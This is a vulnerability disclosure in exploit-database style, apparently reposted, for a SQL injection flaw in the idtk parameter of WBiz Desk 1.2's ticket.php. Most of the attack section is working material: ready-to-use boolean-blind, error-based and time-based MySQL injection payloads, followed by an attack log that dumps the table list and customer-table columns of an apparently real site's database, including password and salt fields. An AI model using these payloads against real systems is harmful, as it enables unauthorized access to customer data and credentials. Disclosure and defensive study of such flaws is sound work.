WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/5641/ │
│ Vendor : WeBiz Digital │
│ Software : WBiz Desk 1.2 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /ticket.php
http://website/ticket.php?tk=1&idtk=[SQLi]&action=close
GET parameter 'idtk' is vulnerable to SQL Injection
---
Parameter: idtk (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close
---
[+] Starting the Attack
fetching current database
current database: 'wbizdesk_*****_com_br'
fetching tables
[12 tables]
+----------------+
| accounts |
| category |
| chat |
| config |
| customers |
| departments |
| email_template |
| log_tb |
| messages |
| tickets |
| tutorial |
| users |
+----------------+
fetching columns for table 'customers'
[19 columns]
+--------------+-------------------+
| Column | Type |
+--------------+-------------------+
| name | varchar(160) |
| number | varchar(11) |
| status | enum('S','B','N') |
| address | varchar(255) |
| city | varchar(160) |
| company | varchar(160) |
| country | varchar(60) |
| cpf_cnpj | varchar(60) |
| email | varchar(255) |
| id | int(11) |
| ip | varchar(90) |
| neighborhood | varchar(160) |
| obs | text |
| os | varchar(160) |
| pass | varchar(160) |
| phrase | varchar(160) |
| salt | varchar(255) |
| state | varchar(160) |
| zipcode | varchar(60) |
+--------------+-------------------+
[-] Done
原文始发于CraCkEr:WBiz Desk 1.2 SQL Injection
相关文章
暂无评论...